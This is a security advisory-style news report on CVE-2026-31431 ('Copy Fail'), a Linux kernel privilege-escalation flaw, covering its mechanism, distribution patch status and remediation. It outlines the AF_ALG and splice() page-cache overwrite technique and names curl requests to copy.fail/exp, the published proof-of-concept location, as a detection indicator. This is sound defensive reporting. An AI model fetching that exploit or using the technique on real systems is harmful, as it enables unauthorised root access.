Copy Fail в Linux: уязвимость CVE-2026-31431 ведет к root

Copy Fail, tracked as CVE-2026-31431, has emerged as a serious threat to Linux systems. The flaw allows local unprivileged users to elevate their privileges to root, putting millions of installations at risk. According to the report, the vulnerability affects nearly all Linux kernel versions released since 2017.

As of 1 May 2026, the fix had already been merged into the mainline Linux kernel, but many distributions had not yet incorporated the patch into their own builds. This creates a dangerous window of exposure, especially for environments that delay kernel updates.

How the vulnerability works

Copy Fail stems from a logical flaw in the Linux kernel’s cryptographic AEAD implementation. The problem lies in the handling of scatter-gather lists. Incorrect processing makes it possible for an attacker to overwrite four bytes in the page cache of any readable file on the system, including critical executable files such as setuid binaries.

By combining this flaw with AF_ALG sockets and the splice() system call, an attacker can leverage the condition to gain elevated privileges.

Distribution response remains uneven

Linux distributions have reacted at different speeds:

• Debian sid (unstable) has already been patched;
• stable Debian releases remain vulnerable, with no confirmed fixes backported to stable branches;
• Ubuntu and CloudLinux had not released fixes as of the cited date;
• Fedora, RHEL and others were in the process of rolling out patches;
• Arch Linux, following a rolling release model, appears to have applied the necessary fixes promptly.

In practice, this means patch status depends heavily on the distribution and release channel, making verification essential for security teams.

Signs of exploitation

Monitoring for signs of exploitation is considered critical. One potential indicator is the presence of the message «NET: Registered PF_ALG protocol family» in kern.log and syslog. The message itself is normal during boot and when legitimate applications use the feature, but it may warrant further investigation if it appears alongside other suspicious activity.

Investigators should also track interactions with the Xint website, where Proof of Concept (PoC) code has been published. In particular, attention should be paid to curl commands that query:

copy.fail/exp

Internal tests also showed that running a modified version of /usr/bin/su with altered page cache state can produce anomalies in authentication logs, including entries without an associated caller identifier. According to the report, this suggests that exploitation attempts may corrupt the runtime state of the binary, complicating post-compromise forensic analysis.

What organizations should do now

Organizations using Linux systems should prioritize remediation immediately. The report recommends:

• applying the latest available kernel fixes without delay;
• verifying whether the distribution has already backported the patch;
• monitoring logs for suspicious AF_ALG activity and unusual authentication events;
• reviewing outbound requests to copy.fail and related PoC resources;
• treating affected systems as potentially exposed until patch status is confirmed.

Given the breadth of impact and the ease with which local access can turn into full root compromise, CVE-2026-31431 should be treated as a high-priority vulnerability for any Linux environment.

Отчет получен из сервиса CTT Report Hub. Права на отчет принадлежат его владельцу.

Ознакомиться подробнее с отчетом можно по ссылке.